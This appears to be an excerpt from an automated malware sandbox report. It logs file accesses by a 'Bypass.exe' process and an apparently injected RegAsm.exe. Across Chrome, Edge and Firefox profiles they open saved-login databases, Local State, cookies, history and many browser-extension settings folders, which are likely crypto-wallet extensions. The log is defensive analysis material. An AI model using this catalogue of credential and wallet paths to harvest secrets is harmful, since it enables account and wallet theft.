                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
